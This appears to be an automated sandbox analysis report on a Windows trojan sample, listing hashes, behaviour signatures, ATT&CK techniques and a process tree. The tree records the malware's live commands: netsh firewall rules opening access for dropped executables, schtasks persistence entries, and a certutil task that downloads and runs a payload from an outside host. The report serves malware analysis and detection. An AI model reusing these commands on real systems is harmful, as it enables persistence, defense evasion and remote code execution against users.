Analysis

  • max time kernel
    72s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-11-2020 19:56

General

  • Target

    SecuriteInfo.com.Trojan.Siggen9.47152.28782.22356.exe

  • Size

    3.8MB

  • MD5

    e829d2351395c1efd672529f9b85b7fc

  • SHA1

    9954fcf07992c0f738b4b47a9189661fde4cfd8b

  • SHA256

    5851f851fd3f4818e16bcf8ac00b723f43d2efd4b2d1acd3c506a8d32f8de14b

  • SHA512

    438415a05479190e55756e08920096c8d5fe76efb68f5e2f0e84bcbfa71bc28040454e52d37329e2177bd7c55e6b231884eae19993caf5373a3d48a1087efe91

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Windows security bypass 2 TTPs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 285 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen9.47152.28782.22356.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen9.47152.28782.22356.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:912
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen9.47152.28782.22356.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen9.47152.28782.22356.exe"
      2⤵
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:188
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57f67627e14e\57f67627e14e\57f67627e14e.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57f67627e14e\57f67627e14e\57f67627e14e.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:3648
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:732
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:1076
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1476
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:3840
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2252
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2624

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

3
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    MD5

    e829d2351395c1efd672529f9b85b7fc

    SHA1

    9954fcf07992c0f738b4b47a9189661fde4cfd8b

    SHA256

    5851f851fd3f4818e16bcf8ac00b723f43d2efd4b2d1acd3c506a8d32f8de14b

    SHA512

    438415a05479190e55756e08920096c8d5fe76efb68f5e2f0e84bcbfa71bc28040454e52d37329e2177bd7c55e6b231884eae19993caf5373a3d48a1087efe91

  • C:\Windows\rss\csrss.exe
    MD5

    e829d2351395c1efd672529f9b85b7fc

    SHA1

    9954fcf07992c0f738b4b47a9189661fde4cfd8b

    SHA256

    5851f851fd3f4818e16bcf8ac00b723f43d2efd4b2d1acd3c506a8d32f8de14b

    SHA512

    438415a05479190e55756e08920096c8d5fe76efb68f5e2f0e84bcbfa71bc28040454e52d37329e2177bd7c55e6b231884eae19993caf5373a3d48a1087efe91

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    335ee604bc5976ee83b38f3dddfed723

    SHA1

    2511136d8b9d34b521dd6d9d6c9bdd4c34a0e6ac

    SHA256

    8373267ef4dceb7999ccfa9c3c47e75c2623f5aa16a5e46baf2a394faaf5d77f

    SHA512

    87ad9512b45bcfcb0d1287788d88adb2563b003c960eb0e36185cbd2d038d878bee6768a1a6585a2f8ba98f294a8c56762af24f7c8cfc1afaf57e67e9ed5a9ee

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • memory/188-4-0x0000000000000000-mapping.dmp
  • memory/188-6-0x0000000003BB0000-0x0000000003BB1000-memory.dmp
    Filesize

    4KB

  • memory/188-7-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/432-10-0x0000000000000000-mapping.dmp
  • memory/732-12-0x0000000000000000-mapping.dmp
  • memory/912-1-0x0000000003B10000-0x0000000003B11000-memory.dmp
    Filesize

    4KB

  • memory/912-2-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/1076-13-0x0000000000000000-mapping.dmp
  • memory/1476-20-0x0000000000000000-mapping.dmp
  • memory/2252-22-0x0000000000000000-mapping.dmp
  • memory/2660-14-0x0000000000000000-mapping.dmp
  • memory/2660-18-0x00000000041B0000-0x00000000041B1000-memory.dmp
    Filesize

    4KB

  • memory/3648-11-0x0000000000000000-mapping.dmp
  • memory/3840-21-0x0000000000000000-mapping.dmp